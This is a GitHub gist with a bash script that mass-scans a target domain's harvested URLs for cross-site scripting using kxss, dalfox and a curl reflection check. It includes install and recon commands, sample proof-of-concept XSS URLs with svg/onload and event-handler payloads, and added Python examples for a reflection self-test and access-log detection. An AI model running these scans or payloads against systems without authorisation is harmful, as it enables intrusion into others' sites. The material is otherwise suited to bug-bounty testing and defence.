
@R0X4R
Last active March 15, 2024 15:10
A fast XSS detector script
#!/bin/bash
# Requirements: KXSS (https://github.com/Emoe/kxss), Dalfox (https://github.com/hahwul/dalfox), QSreplace (https://github.com/tomnomnom/qsreplace)
# Preparation: subfinder -d target.tld -all -silent | httpx -silent | gauplus --random-agent -b eot,jpg,jpeg,gif,css,tif,tiff,png,ttf,otf,woff,woff2,ico,pdf,svg,txt -t 100 -o params.txt && cat params.txt | gf xss | sed "s/'/ /g" | sed "s/(/ /g" | sed "s/)/ /g" | qsreplace "FUZZ" 2> /dev/null | anew -q testparams.txt
# Usage: ./inxss.sh testparams.txt target.tld
if [ $# -lt 2 ] || [ ! -r "$1" ]; then
  echo "Usage: $0 <url-list> <target.tld>" >&2
  exit 1
fi
lists="$1"
# One output directory per run, named after the target and the start time
mkout="$2_$(date +%F_%H_%M_%S)"
mkdir -p "$mkout"
echo -e "Total $(wc -l < "$lists") targets loaded"
sleep 6s
echo -e "[$(date +"%F %H:%M:%S")] Starting scan..."
SECONDS=0
# Stage 1: kxss reports which of " ' < > each parameter reflects unencoded; keep only lines with a finding
xargs -a "$lists" -P 50 -I % bash -c "echo % | kxss" 2> /dev/null | grep -E "< >|\"" | anew -q "$mkout/kxss.txt"
# Stage 2: reduce the kxss lines back to bare URLs for the next two checks
grep -o '^.*Param' "$mkout/kxss.txt" | sed 's/ Param\|URL\: //g' | anew -q "$mkout/testdal.txt"
# Stage 3: quick single-payload reflection check, flags URLs whose response echoes the payload verbatim
cat "$mkout/testdal.txt" | qsreplace "\">/><svg/onload=confirm(document.domain)>" | xargs -P 50 -I % bash -c "curl -s -L -H \"X-Bugbounty: Testing\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\" --insecure '%' | grep \"<svg/onload=confirm(document.domain)>\" && echo -e \"[POTENTIAL XSS] - % \n \"" 2> /dev/null | grep "POTENTIAL XSS" | anew -q "$mkout/manuxss.txt" &> /dev/null
# Stage 4: full dalfox run over the same URL list
dalfox file "$mkout/testdal.txt" pipe --silence --no-color --no-spinner --mass --mass-worker 100 --skip-bav -w 100 -H "X-Bugbounty: Testing" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36" 2> /dev/null | anew -q "$mkout/dalfox.txt" &> /dev/null
DURATION=$SECONDS
rm -f "$mkout/testdal.txt"
echo -e "Scan completed, total $((DURATION / 60)) min and $((DURATION % 60)) seconds taken"
# Exit 0 on a completed run so callers chaining this script can tell success from failure
exit 0
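The first stage of the script relies on kxss, which reports which of the four characters `" ' < >` a parameter reflects without encoding. As an added example (not part of the gist, and not kxss's own code), here is that check reimplemented in Python as a self-test a developer can run against their own rendering code before a scanner like this one does: each probe character is sent between unique delimiters and counts as unfiltered only if it comes back raw between them. Three constructed handlers (verbatim reflection, angle-bracket stripping only, full HTML escaping) show the resulting `Unfiltered: [...]` line in the layout the sample output above uses. The handler functions, the delimiter strings and the sample URL are assumptions.

```python
import html

PROBE_CHARS = ['"', "'", '<', '>']   # the four characters the kxss.txt lines report on


def unfiltered_chars(render, prefix="zx9k", suffix="k9zx"):
    """Return the probe characters that `render` reflects unencoded.

    Each character is wrapped in unique alphanumeric delimiters so the check
    only fires when that exact character survives between them, which is the
    idea behind the 'Unfiltered: [...]' line in the script's kxss.txt output.
    """
    found = []
    for ch in PROBE_CHARS:
        body = render(prefix + ch + suffix)
        if prefix + ch + suffix in body:
            found.append(ch)
    return found


def format_kxss_line(url, param, chars):
    """Render a finding in the same layout the page's sample output uses."""
    return f"URL: {url} Param: {param} Unfiltered: [{' '.join(chars)}]"


# --- constructed handlers standing in for a web endpoint that reflects ?p= ---

def vulnerable_render(p):
    # Reflects the parameter verbatim into an attribute and into element text.
    return f'<input value="{p}"><p>{p}</p>'


def bracket_strip_render(p):
    # Common half-measure: removes < and > but leaves quotes, so the attribute
    # context can still be broken out of even though no tag can be injected.
    cleaned = p.replace("<", "").replace(">", "")
    return f'<input value="{cleaned}"><p>{cleaned}</p>'


def escaped_render(p):
    # html.escape(quote=True) encodes & < > " and ' before reflection.
    safe = html.escape(p, quote=True)
    return f'<input value="{safe}"><p>{safe}</p>'


if __name__ == "__main__":
    url = "http://target.tld:80/test/?p=FUZZ"   # URL shape from the page's sample output
    for name, handler in [("verbatim", vulnerable_render),
                          ("strip <>", bracket_strip_render),
                          ("html.escape", escaped_render)]:
        print(f"{name:12s} {format_kxss_line(url, 'p', unfiltered_chars(handler))}")
```

The middle handler is the instructive one: stripping angle brackets makes the `<svg/onload=...>` payload in stage 3 fail, yet the attribute context is still breakable with a quote, which is exactly what the `Unfiltered: [" ']` line would tell a reviewer. Context-aware encoding (here `html.escape` with `quote=True`) is the fix that empties the list.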

XSSIN

A fast XSS detector script


#>Requirements

$ go get -u github.com/tomnomnom/qsreplace
$ go get github.com/tomnomnom/waybackurls
$ GO111MODULE=on go get -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder
$ GO111MODULE=on go get -v github.com/projectdiscovery/httpx/cmd/httpx
$ GO111MODULE=on go get -u -v github.com/bp0lr/gauplus
$ go get -u github.com/tomnomnom/gf
$ go get -u github.com/tomnomnom/anew
$ GO111MODULE=on go get -v github.com/hahwul/dalfox/v2
$ go get github.com/Emoe/kxss

#>Preparation

$ subfinder -d target.tld -all -silent | httpx -silent | anew -q domains
$ cat domains | xargs -P 50 -I % bash -c "echo % | waybackurls" 2> /dev/null | anew -q wayback.txt &> /dev/null
$ cat domains | gauplus --random-agent -b eot,jpg,jpeg,gif,css,tif,tiff,png,ttf,otf,woff,woff2,ico,pdf,svg,txt -t 100 -o gauplus.txt &> /dev/null
$ cat wayback.txt gauplus.txt | grep "target.tld" | sort -u | urldedupe -s | qsreplace "FUZZ" | gf xss | sed "s/'//g" | sed "s/(//g" | sed "s/)//g" | anew -q parameters &> /dev/null

#>Usage

$ chmod +x inxss.sh
$ ./inxss.sh parameters target.tld

#>Sample

usage:~ ./inxss.sh parameters target.tld

Total 350 targets loaded
[2021-07-17 15:13:16] Starting scan...
Scan completed, total 2 min and 17 seconds taken

usage:~ cd target.tld_2021-07-17_15_13_10/
usage/target.tld_2021-07-17_15_13_10:~ cat *

[POC][V][GET] http://target.tld:80/test/?p=FUZZ%22onpointerleave%3Dalert%281%29+class%3Ddalfox+
[POC][V][GET] http://target.tld:80/test/test.php?p=FUZZ%22%3E%3Cxmp%3E%3Cp+title%3D%22%3C%2Fxmp%3E%3Csvg%2Fonload%3Dalert%281%29+class%3Ddalfox%3E

URL: http://target.tld:80/test/?p=FUZZ Param: p Unfiltered: [" ' < >]
URL: http://target.tld:80/test/test.php?p=FUZZ Param: p Unfiltered: [" ' < >]

[POTENTIAL XSS] - http://target.tld:80/test/?p=%22%3E%2F%3E%3Csvg%2Fonload%3Dconfirm%28document.domain%29%3E
[POTENTIAL XSS] - http://target.tld:80/test/test.php?p=%22%3E%2F%3E%3Csvg%2Fonload%3Dconfirm%28document.domain%29%3E
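The sample output above shows the two request shapes this script produces: dalfox payloads carry a `class=dalfox` marker, and both the dalfox and the manual stage-3 payloads rely on an inline event handler such as `onload=` or `onpointerleave=`. As an added example (not part of the gist), the following Python triage script parses access-log lines in the common "combined" format, percent-decodes each request target once, flags requests carrying those indicators, and aggregates hits per client so the fan-out of a parallel run (`xargs -P 50` in the script) is visible. The log lines, client IPs and timestamps are constructed; the two flagged URLs reuse the shapes from the sample output.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Apache/nginx "combined" log format; the sample lines below are constructed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators taken from the page's sample output. The event-handler pattern
# requires a preceding quote, slash, bracket or whitespace so ordinary query
# keys such as ?onion=1 are not matched.
INDICATORS = {
    "dalfox_marker": re.compile(r"class=dalfox", re.I),
    "inline_event_handler": re.compile(r"""(?:^|[\s"'/<>])on[a-z]+\s*=""", re.I),
    "svg_onload": re.compile(r"<svg/?\s*onload", re.I),
}

SAMPLE_LOG = [  # constructed
    '203.0.113.5 - - [17/Jul/2021:15:13:20 +0000] "GET /test/?p=FUZZ%22onpointerleave%3Dalert%281%29+class%3Ddalfox+ HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36"',
    '203.0.113.5 - - [17/Jul/2021:15:13:21 +0000] "GET /test/test.php?p=%22%3E%2F%3E%3Csvg%2Fonload%3Dconfirm%28document.domain%29%3E HTTP/1.1" 200 498 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36"',
    '198.51.100.7 - - [17/Jul/2021:15:13:22 +0000] "GET /test/?p=hello+world HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/90.0"',
    '198.51.100.7 - - [17/Jul/2021:15:13:23 +0000] "GET /shop?category=onion&season=summer HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/90.0"',
]


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(url):
    """Percent-decode the request target once and return the indicator names that match."""
    decoded = unquote_plus(url)
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]


def scan(lines):
    """Return (findings, per_ip).

    findings: one dict per flagged request (ip, raw url, matched indicators).
    per_ip:   hit count and the set of distinct paths probed by each client,
              which is where a parallel scanner stands out from a single user.
    """
    findings = []
    per_ip = defaultdict(lambda: {"hits": 0, "paths": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec["url"])
        if not tags:
            continue
        findings.append({"ip": rec["ip"], "url": rec["url"], "indicators": tags})
        per_ip[rec["ip"]]["hits"] += 1
        per_ip[rec["ip"]]["paths"].add(rec["url"].split("?", 1)[0])
    return findings, dict(per_ip)


if __name__ == "__main__":
    findings, per_ip = scan(SAMPLE_LOG)
    for f in findings:
        print(f"{f['ip']}  {', '.join(f['indicators'])}  {f['url']}")
    for ip, stats in per_ip.items():
        print(f"{ip}: {stats['hits']} flagged requests across {len(stats['paths'])} paths")
```

Decoding once before matching matters: the page's sample URLs are fully percent-encoded, so a rule that greps the raw log for `<svg` or `class=dalfox` would miss every one of them. The per-client summary is the signal worth alerting on; a single flagged request is often a false positive, but dozens of distinct paths from one address within seconds is the shape this script produces.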

geeknik commented Apr 19, 2022

Can I ask what the advantage is to running both gauplus and waybackurls? If I'm to understand correctly, gauplus already pulls data from waybackurls.


R0X4R commented Apr 20, 2022

> Can I ask what the advantage is to running both gauplus and waybackurls? If I'm to understand correctly, gauplus already pulls data from waybackurls.

Hey hi @geeknik,

Thanks for asking this question. I have found extra results while running both tools. I don't know what the reason behind it is, but if you compare the results you'll definitely get some extra results.


geeknik commented Apr 20, 2022

Excellent, thank you for sharing 👍🏻
